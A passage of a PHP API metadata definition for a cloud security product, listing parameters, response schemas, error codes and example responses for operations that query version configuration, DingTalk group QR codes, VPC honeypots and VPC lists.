."\n" .'>This parameter is deprecated. You can ignore it.>', 'type' => 'boolean', 'example' => 'false', 'title' => ''], 'InstanceId' => ['description' => 'The instance ID of the purchased Security Center instance.', 'type' => 'string', 'example' => 'sas-vg6hafdsafs****', 'title' => ''], 'SlsCapacity' => ['description' => 'The purchased log storage capacity. Unit: GB. Value range: 0 to 200000.', 'type' => 'integer', 'format' => 'int64', 'example' => '10240', 'title' => ''], 'VmCores' => ['description' => 'The number of purchased authorized cores.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'AllowPartialBuy' => ['description' => 'Indicates whether pay-as-you-go purchasing is allowed. Valid values:'."\n" .'- **0**: Not allowed.'."\n" .'- **1**: Allowed.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'AppWhiteList' => ['description' => 'Indicates whether the application whitelist is enabled. Valid values:'."\n" .'- **0**: Not enabled.'."\n" .'- **2**: Enabled.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'ImageScanCapacity' => ['description' => 'The number of purchased image scan authorizations.', 'type' => 'integer', 'format' => 'int64', 'example' => '8954', 'title' => ''], 'IsTrialVersion' => ['description' => 'Indicates whether the current Security Center edition is a trial version. Valid values:'."\n" .'- **0**: Not a trial version.'."\n" .'- **1**: Trial version.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'UserDefinedAlarms' => ['description' => 'Indicates whether the custom alerting feature is enabled. Valid values:'."\n" .'- **0**: Not enabled.'."\n" .'- **2**: Enabled.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'OpenTime' => ['description' => 'The timestamp when the service was activated. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1657244824669', 'title' => ''], 'IsNewContainerVersion' => ['description' => 'Indicates whether the instance is the new Ultimate Edition. Valid values:'."\n" .'- **true**: The instance is the latest version.'."\n" .'- **false**: The instance is not the latest version.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'IsNewMultiVersion' => ['description' => 'Indicates whether the instance is the new multi-version. Valid values:'."\n" .'- **true**: The instance is the latest multi-version.'."\n" .'- **false**: The instance is not the latest multi-version.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'ThreatAnalysisCapacity' => ['description' => 'The purchased threat analysis capacity. Unit: GB.', 'type' => 'integer', 'format' => 'int64', 'example' => '25', 'title' => ''], 'CspmCapacity' => ['description' => 'The number of purchased cloud platform configuration check scans. Unit: times/month.', 'type' => 'integer', 'format' => 'int64', 'example' => '10', 'title' => ''], 'VulFixCapacity' => ['description' => 'The number of purchased vulnerability fixes. Unit: times/month.', 'type' => 'integer', 'format' => 'int64', 'example' => '10', 'title' => ''], 'RaspCapacity' => ['description' => 'The number of purchased application protection quotas. Unit: quotas/month.', 'type' => 'integer', 'format' => 'int64', 'example' => '10', 'title' => ''], 'AgentlessCapacity' => ['description' => 'The number of agentless detection quotas.'."\n" .'> Agentless detection is not available for purchase. You can ignore this field.', 'type' => 'integer', 'format' => 'int64', 'example' => '10', 'title' => ''], 'IsPostpay' => ['description' => 'Indicates whether pay-as-you-go billing is enabled. Valid values:'."\n" .'- **false**: Not enabled.'."\n" .'- **true**: Enabled.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'PostPayInstanceId' => ['description' => 'The instance ID of the pay-as-you-go instance.', 'type' => 'string', 'example' => 'postpay-sas-**', 'title' => ''], 'PostPayModuleSwitch' => ['description' => 'The status of pay-as-you-go module switches in JsonString format. Valid values:'."\n" .'- Key:'."\n" .' - **VUL**: Vulnerability fix module.'."\n" .' - **CSPM**: Cloud Security Posture Management (CSPM) module.'."\n" .' - **AGENTLESS**: Agentless detection module.'."\n" .' - **SERVERLESS**: Serverless security module.'."\n" .' - **CTDR**: Cloud Threat Detection and Response (CTDR) module.'."\n" .' - **POST_HOST**: Host and container security module.'."\n" .' - **SDK**: Malicious file detection SDK module.'."\n" .' - **RASP**: Application protection module.'."\n" .'- Value: 0 indicates disabled. 1 indicates enabled.', 'type' => 'string', 'example' => '{"VUL":1}', 'title' => ''], 'PostPayStatus' => ['description' => 'The instance status of the pay-as-you-go instance. Valid values:'."\n" .'- **1**: Normal.'."\n" .'- **2**: Suspended due to overdue payment.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PostPayOpenTime' => ['description' => 'The time when pay-as-you-go billing was activated.', 'type' => 'integer', 'format' => 'int64', 'example' => '1698915219000', 'title' => ''], 'SdkCapacity' => ['description' => 'The number of malicious file detection SDK authorizations.', 'type' => 'integer', 'format' => 'int64', 'example' => '10', 'title' => ''], 'AntiRansomwareCapacity' => ['description' => 'The anti-ransomware backup capacity. Unit: GB.', 'type' => 'integer', 'format' => 'int32', 'example' => '160', 'title' => ''], 'NewThreatAnalysis' => ['description' => 'Indicates whether the new version of Cloud Threat Detection and Response (CTDR) is enabled. The new version supports purchasing ingestion traffic and log storage capacity. Valid values:'."\n" .'- **0**: No.'."\n" .'- **1**: Yes.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'ThreatAnalysisFlow' => ['description' => 'The purchased log ingestion traffic for Cloud Threat Detection and Response (CTDR). Unit: GB/day.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'MergedVersion' => ['description' => 'The higher protection edition between the subscription and pay-as-you-go host and container security services of Security Center when both are enabled. Valid values:'."\n" .'- **1**: Free Edition.'."\n" .'- **6**: Anti-virus Edition.'."\n" .'- **5**: Premium Edition.'."\n" .'- **3**: Enterprise Edition.'."\n" .'- **7**: Ultimate Edition.', 'type' => 'integer', 'format' => 'int32', 'example' => '7', 'title' => ''], 'PostPayHostVersion' => ['description' => 'The highest protection edition for bound assets when the pay-as-you-go host and container security service is enabled. Valid values:'."\n" .'- **1**: Free Edition.'."\n" .'- **3**: Enterprise Edition.'."\n" .'- **5**: Advanced Edition.'."\n" .'- **6**: Anti-virus Edition.'."\n" .'- **7**: Ultimate Edition.', 'type' => 'integer', 'format' => 'int32', 'example' => '7', 'title' => ''], 'AntiRansomwareService' => ['description' => 'The status of the anti-ransomware managed service. Valid values:'."\n" .'- **0**: Not enabled.'."\n" .'- **1**: Enabled.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'MultiVersion' => ['description' => 'The multi-version number and authorization usage information.', 'type' => 'string', 'example' => 'null', 'title' => ''], 'CanTryPostPaidPackage' => ['description' => 'Indicates whether the pay-as-you-go trial plan can be activated. Valid values:'."\n" .'- **0**: Not supported.'."\n" .'- **1**: Supported.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'InstanceBuyType' => ['description' => 'The instance purchase type. Valid values:'."\n" .'- **0**: Self-purchased.'."\n" .'- **1**: Allocated by multi-account management.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'OnboardedAssets' => ['title' => '', 'description' => 'The AI digital human managed instances.', 'type' => 'integer', 'format' => 'int32', 'example' => '10'], 'IntelligentAnalysisFlow' => ['title' => '', 'description' => 'The AI digital human analysis traffic.', 'type' => 'integer', 'format' => 'int32', 'example' => '100'], 'CspmInstanceCapacity' => ['title' => '', 'type' => 'integer', 'format' => 'int32', 'example' => '100', 'description' => ''], 'HybridSwitch' => ['title' => '', 'type' => 'integer', 'format' => 'int32', 'example' => '100', 'description' => ''], 'HybridPaidModuleSwitchMap' => ['title' => '', 'type' => 'integer', 'format' => 'int32', 'example' => '100', 'description' => ''], 'NewPostPaidCspm' => ['title' => '', 'type' => 'integer', 'format' => 'int32', 'example' => '100', 'description' => ''], 'HybridPaidStatus' => ['type' => 'integer', 'format' => 'int32', 'description' => '', 'title' => '', 'example' => ''], 'BuySasEdr' => ['type' => 'string', 'description' => '', 'title' => '', 'example' => ''], 'SasEdrClientAuthCount' => ['type' => 'string', 'description' => '', 'title' => '', 'example' => ''], 'SasEdrPrePaidInstanceId' => ['type' => 'string', 'description' => '', 'title' => '', 'example' => ''], 'SasEdrPostPaidInstanceId' => ['type' => 'string', 'description' => '', 'title' => '', 'example' => ''], 'SasEdrVersion' => ['type' => 'string', 'description' => '', 'title' => '', 'example' => ''], 'HybridPaidGrayStatus' => ['type' => 'string', 'description' => '', 'title' => '', 'example' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'no permission', 'description' => ''], ['errorCode' => 'RdCheckNoPermission', 'errorMessage' => 'Resource directory account verification has no permission.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ['errorCode' => 'RdCheckInnerError', 'errorMessage' => 'Resource directory account service internal error.', 'description' => ''], ], ], 'title' => 'Query version details of a purchased security center instance', 'responseParamsDescription' => 'In addition to the response parameters listed in the preceding table, the following parameters are also returned in actual calls: '."\n" .'- **AvdsFlag**'."\n" .'- **FLag**'."\n" .'- **CreateTime**'."\n" .'- **IsSasOpening**'."\n" .'- **Log**'."\n" .'- **AgentlessCapacity**'."\n" .'> The parameters listed above are deprecated. You can ignore them.', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeVersionConfig'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"MVAuthCount\\": 5000,\\n \\"SasLog\\": 1,\\n \\"SasScreen\\": 0,\\n \\"HoneypotCapacity\\": 20,\\n \\"MVUnusedAuthCount\\": 40,\\n \\"WebLock\\": 0,\\n \\"AppWhiteListAuthCount\\": 20,\\n \\"RequestId\\": \\"C2DC96D2-DD2E-49D9-A28E-85590475DF55\\",\\n \\"LastTrailEndTime\\": 1603934844000,\\n \\"Version\\": 3,\\n \\"WebLockAuthCount\\": 0,\\n \\"ReleaseTime\\": 1625846400000,\\n \\"HighestVersion\\": 1,\\n \\"AssetLevel\\": 30,\\n \\"IsOverBalance\\": false,\\n \\"InstanceId\\": \\"sas-vg6hafdsafs****\\",\\n \\"SlsCapacity\\": 10240,\\n \\"VmCores\\": 10,\\n \\"AllowPartialBuy\\": 1,\\n \\"AppWhiteList\\": 2,\\n \\"ImageScanCapacity\\": 8954,\\n \\"IsTrialVersion\\": 0,\\n \\"UserDefinedAlarms\\": 0,\\n \\"OpenTime\\": 1657244824669,\\n \\"IsNewContainerVersion\\": true,\\n \\"IsNewMultiVersion\\": true,\\n \\"ThreatAnalysisCapacity\\": 25,\\n \\"CspmCapacity\\": 10,\\n \\"VulFixCapacity\\": 10,\\n \\"RaspCapacity\\": 10,\\n \\"AgentlessCapacity\\": 10,\\n \\"IsPostpay\\": true,\\n \\"PostPayInstanceId\\": \\"postpay-sas-**\\",\\n \\"PostPayModuleSwitch\\": \\"{\\\\\\"VUL\\\\\\":1}\\",\\n \\"PostPayStatus\\": 1,\\n \\"PostPayOpenTime\\": 1698915219000,\\n \\"SdkCapacity\\": 10,\\n \\"AntiRansomwareCapacity\\": 160,\\n \\"NewThreatAnalysis\\": 1,\\n \\"ThreatAnalysisFlow\\": 10,\\n \\"MergedVersion\\": 7,\\n \\"PostPayHostVersion\\": 7,\\n \\"AntiRansomwareService\\": 1,\\n \\"MultiVersion\\": \\"null\\",\\n \\"CanTryPostPaidPackage\\": 1,\\n \\"InstanceBuyType\\": 0,\\n \\"OnboardedAssets\\": 10,\\n \\"IntelligentAnalysisFlow\\": 100,\\n \\"CspmInstanceCapacity\\": 100,\\n \\"HybridSwitch\\": 100,\\n \\"HybridPaidModuleSwitchMap\\": 100,\\n \\"NewPostPaidCspm\\": 100,\\n \\"HybridPaidStatus\\": 0,\\n \\"BuySasEdr\\": \\"\\",\\n \\"SasEdrClientAuthCount\\": \\"\\",\\n \\"SasEdrPrePaidInstanceId\\": \\"\\",\\n \\"SasEdrPostPaidInstanceId\\": \\"\\",\\n \\"SasEdrVersion\\": \\"\\",\\n \\"HybridPaidGrayStatus\\": \\"\\"\\n}","type":"json"}]', ], 'DescribeVolDingdingMessage' => [ 'summary' => 'Queries the QR code address of a DingTalk group.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address.'."\n", 'type' => 'string', 'required' => false, 'example' => '1.2.XX.XX', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'* **zh**: Chinese'."\n" .'* **en**: English'."\n", 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'DingdingUrl' => ['description' => 'The QR code address of the DingTalk group.'."\n", 'type' => 'string', 'example' => 'https://www.wikihow.com/images_en/thumb/4/48/Get-the-URL-for-Pictures-Step-4-Version-4.jpg/v4-728px-Get-the-URL-for-Pictures-Step-4-Version-4.jpg.webp', 'title' => ''], 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => '7A437E93-47EE-548F-ABCE-13F89AA85585', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'no permission', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"type":"json","example":"{\\n \\"DingdingUrl\\": \\"https://www.wikihow.com/images_en/thumb/4/48/Get-the-URL-for-Pictures-Step-4-Version-4.jpg/v4-728px-Get-the-URL-for-Pictures-Step-4-Version-4.jpg.webp\\",\\n \\"RequestId\\": \\"7A437E93-47EE-548F-ABCE-13F89AA85585\\"\\n}","errorExample":""},{"type":"xml","example":"\\n https://www.wikihow.com/images_en/thumb/4/48/Get-the-URL-for-Pictures-Step-4-Version-4.jpg/v4-728px-Get-the-URL-for-Pictures-Step-4-Version-4.jpg.webp\\n 7A437E93-47EE-548F-ABCE-13F89AA85585\\n","errorExample":""}]', 'title' => 'DescribeVolDingdingMessage', 'requestParamsDescription' => ' ', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '20', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeVolDingdingMessage'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeVolDingdingMessage', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'DescribeVpcHoneyPotCriteria' => [ 'summary' => 'Queries the search conditions that can be used to query honeypots.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasY2S7U2'], ], 'parameters' => [ [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'* **zh**: Chinese.'."\n" .'* **en**: English.'."\n", 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => 'FCE38ADB-7361-4212-AD87-A4514E4DF925', 'title' => ''], 'CriteriaList' => [ 'description' => 'An array that consists of the search conditions.'."\n", 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'Type' => ['description' => 'The type of the search condition. Valid values:'."\n" ."\n" .'* **input**: You must manually enter the search condition.'."\n" .'* **select**: You must select a search condition from the **Values** drop-down list.'."\n", 'type' => 'string', 'example' => 'select', 'title' => ''], 'Name' => ['description' => 'The name of the search condition.'."\n", 'type' => 'string', 'example' => 'vpcRegionId', 'title' => ''], 'Values' => ['description' => 'The values of the search condition. This parameter is returned only if the value of **Type** is **select**.'."\n" ."\n" .'> If the value of **Type** is **input**, the value of this parameter is an empty string.'."\n", 'type' => 'string', 'example' => 'ap-southeast-2,eu-west-1', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"FCE38ADB-7361-4212-AD87-A4514E4DF925\\",\\n \\"CriteriaList\\": [\\n {\\n \\"Type\\": \\"select\\",\\n \\"Name\\": \\"vpcRegionId\\",\\n \\"Values\\": \\"ap-southeast-2,eu-west-1\\"\\n }\\n ]\\n}","type":"json"}]', 'title' => 'DescribeVpcHoneyPotCriteria', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeVpcHoneyPotCriteria', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'HoneyPot', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:honeypot/*'], ], ], ], ], ], 'DescribeVpcHoneyPotList' => [ 'summary' => 'Queries the list of VPC honeypot probes.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'abilityTreeCode' => '92241', 'abilityTreeNodes' => ['FEATUREsasY2S7U2'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'VpcId', 'in' => 'query', 'schema' => ['description' => 'The ID of the VPC in which the honeypot instance that you want to query resides.'."\n" .'> You can call the [DescribeVpcList](~~DescribeVpcList~~) operation to obtain the VPC ID.', 'type' => 'string', 'required' => false, 'example' => 'vpc-d7o009q63fqy21r8u****', 'title' => ''], ], [ 'name' => 'VpcName', 'in' => 'query', 'schema' => ['description' => 'The name of the VPC in which the honeypot instance that you want to query resides.'."\n" .'> You can call the [DescribeVpcList](~~DescribeVpcList~~) operation to obtain the VPC name.', 'type' => 'string', 'required' => false, 'example' => 'abcnet', 'title' => ''], ], [ 'name' => 'VpcRegionId', 'in' => 'query', 'schema' => ['description' => 'The region ID of the VPC in which the honeypot instance that you want to query resides.'."\n" .'> You can call the [DescribeVpcList](~~DescribeVpcList~~) operation to obtain the region ID of the VPC.', 'type' => 'string', 'required' => false, 'example' => 'ap-southeast-2', 'title' => ''], ], [ 'name' => 'HoneyPotExistence', 'in' => 'query', 'schema' => ['description' => 'Specifies whether the VPCs to query have cloud honeypot enabled. Valid values:'."\n" .'- **true**: enabled'."\n" .'- **false**: disabled'."\n", 'type' => 'boolean', 'required' => false, 'example' => 'true', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries per page. Default value: 20. If you leave this parameter empty, 20 entries are returned per page.'."\n" .'> We recommend that you specify this parameter.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number. Pages start from page 1.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '2', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.', 'type' => 'string', 'example' => '4FEC7F58-FCDA-415F-AE25-CD8BC0931DF2', 'title' => ''], 'PageInfo' => [ 'description' => 'The pagination information.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The number of entries per page.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'Count' => ['description' => 'The number of entries on the current page.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], ], 'title' => '', 'example' => '', ], 'VpcHoneyPotDTOList' => [ 'description' => 'The information about cloud honeypot instances.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'VpcName' => ['description' => 'The name of the VPC in which the cloud honeypot instance resides.', 'type' => 'string', 'example' => 'abc-vpcname', 'title' => ''], 'VpcId' => ['description' => 'The ID of the VPC in which the cloud honeypot instance resides.', 'type' => 'string', 'example' => 'vpc-p0w223apdl49sr5zv****', 'title' => ''], 'HoneyPotEniInstanceId' => ['description' => 'The ID of the elastic network interface (ENI) that the cloud honeypot created in the VPC.', 'type' => 'string', 'example' => 'eni-p0whwgg7bing8b80****', 'title' => ''], 'CidrBlock' => ['description' => 'The CIDR block of the VPC.', 'type' => 'string', 'example' => '192.168.XX.XX/16', 'title' => ''], 'VpcStatus' => ['description' => 'The status of the VPC. Valid values:'."\n" .'- **Available**: normal'."\n" .'- **Pending**: being configured'."\n", 'type' => 'string', 'example' => 'Available', 'title' => ''], 'CreateTime' => ['description' => 'The time when the VPC was created. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1607365213000', 'title' => ''], 'HoneyPotVpcSwitchId' => ['description' => 'The ID of the vSwitch to which the ENI used by the cloud honeypot belongs.', 'type' => 'string', 'example' => 'vsw-p0w7gdcfvn20tvdul****', 'title' => ''], 'HoneyPotExistence' => ['description' => 'Indicates whether the VPC has cloud honeypot enabled. Valid values:'."\n" .'- **true**: enabled'."\n" .'- **false**: disabled'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'VpcRegionId' => ['description' => 'The region ID of the VPC in which the cloud honeypot instance resides.'."\n" .'> For the mapping between region IDs and region names, see [Regions and zones](~~40654~~).'."\n", 'type' => 'string', 'example' => 'ap-southeast-2', 'title' => ''], 'HoneyPotEcsInstanceStatus' => ['description' => 'The status of the Elastic Compute Service (ECS) instance that corresponds to the cloud honeypot instance. Valid values:'."\n" .'- **Pending**: being created'."\n" .'- **Running**: running'."\n" .'- **Starting**: starting'."\n" .'- **Stopping**: stopping'."\n" .'- **Stopped**: stopped'."\n", 'type' => 'string', 'example' => 'Running', 'title' => ''], 'HoneyPotInstanceStatus' => ['description' => 'The status of the cloud honeypot instance. Valid values:'."\n" .'- **pending**: being created'."\n" .'- **deleting**: being deleted'."\n" .'- **off**: disabled'."\n" .'- **suspending**: being suspended'."\n" .'- **on**: enabled'."\n", 'type' => 'string', 'example' => 'on', 'title' => ''], 'VpcSwitchIdList' => [ 'description' => 'The information about vSwitches in the VPC.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'VpcSwitchName' => ['description' => 'The name of the vSwitch.', 'type' => 'string', 'example' => 'abc01', 'title' => ''], 'ZoneId' => ['description' => 'The zone ID of the vSwitch.', 'type' => 'string', 'example' => 'ap-southeast-2b', 'title' => ''], 'VpcSwitchId' => ['description' => 'The ID of the vSwitch.', 'type' => 'string', 'example' => 'vsw-p0wdnyv4wzp6jkuu4****', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query VPC honeypot probe list', 'description' => 'If you specify only the Action parameter without specifying any other request parameters, Security Center returns the list of all VPCs regardless of whether honeypot instances are created in the VPCs.', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeVpcHoneyPotList', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"4FEC7F58-FCDA-415F-AE25-CD8BC0931DF2\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 2,\\n \\"Count\\": 2\\n },\\n \\"VpcHoneyPotDTOList\\": [\\n {\\n \\"VpcName\\": \\"abc-vpcname\\",\\n \\"VpcId\\": \\"vpc-p0w223apdl49sr5zv****\\",\\n \\"HoneyPotEniInstanceId\\": \\"eni-p0whwgg7bing8b80****\\",\\n \\"CidrBlock\\": \\"192.168.XX.XX/16\\",\\n \\"VpcStatus\\": \\"Available\\",\\n \\"CreateTime\\": 1607365213000,\\n \\"HoneyPotVpcSwitchId\\": \\"vsw-p0w7gdcfvn20tvdul****\\",\\n \\"HoneyPotExistence\\": true,\\n \\"VpcRegionId\\": \\"ap-southeast-2\\",\\n \\"HoneyPotEcsInstanceStatus\\": \\"Running\\",\\n \\"HoneyPotInstanceStatus\\": \\"on\\",\\n \\"VpcSwitchIdList\\": [\\n {\\n \\"VpcSwitchName\\": \\"abc01\\",\\n \\"ZoneId\\": \\"ap-southeast-2b\\",\\n \\"VpcSwitchId\\": \\"vsw-p0wdnyv4wzp6jkuu4****\\"\\n }\\n ]\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeVpcList' => [ 'summary' => 'Queries the information about virtual private clouds (VPCs).', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'Count' => ['description' => 'The total number of entries returned.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '7E0618A9-D5EF-4220-9471-C42B5E92719F', 'title' => ''], 'VpcList' => [ 'description' => 'An array that consists of VPCs.'."\n", 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'InstanceDesc' => ['description' => 'The information about the virtual private cloud (VPC).'."\n", 'type' => 'string', 'example' => 'TestVpcNote', 'title' => ''], 'InstanceName' => ['description' => 'The name of the VPC.'."\n", 'type' => 'string', 'example' => 'test', 'title' => ''], 'EcsCount' => ['description' => 'The number of Elastic Compute Service (ECS) instances.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '9', 'title' => ''], 'InstanceId' => ['description' => 'The ID of the ECS instance.'."\n", 'type' => 'string', 'example' => 'ins_1321_asedb_ada', 'title' => ''], 'RegionId' => ['description' => 'The region in which the server resides.'."\n", 'type' => 'string', 'example' => 'cn-hangzhou', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"type":"json","example":"{\\n \\"Count\\": 1,\\n \\"RequestId\\": \\"7E0618A9-D5EF-4220-9471-C42B5E92719F\\",\\n \\"VpcList\\": [\\n {\\n \\"InstanceDesc\\": \\"TestVpcNote\\",\\n \\"InstanceName\\": \\"test\\",\\n \\"EcsCount\\": 9,\\n \\"InstanceId\\": \\"ins_1321_asedb_ada\\",\\n \\"RegionId\\": \\"cn-hangzhou\\"\\n }\\n ]\\n}","errorExample":""},{"type":"xml","example":"\\n\\n ins_1321_asedb_ada\\n vpc\\n vpc\\n 9\\n 2\\n 1\\n\\n7E0618A9-D5EF-4220-9471-C42B5E92719F\\n1\\n","errorExample":""}]', 'title' => 'DescribeVpcList', 'requestParamsDescription' => ' ', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeVpcList'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeVpcList', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'DescribeVulCheckTaskStatusDetail' => 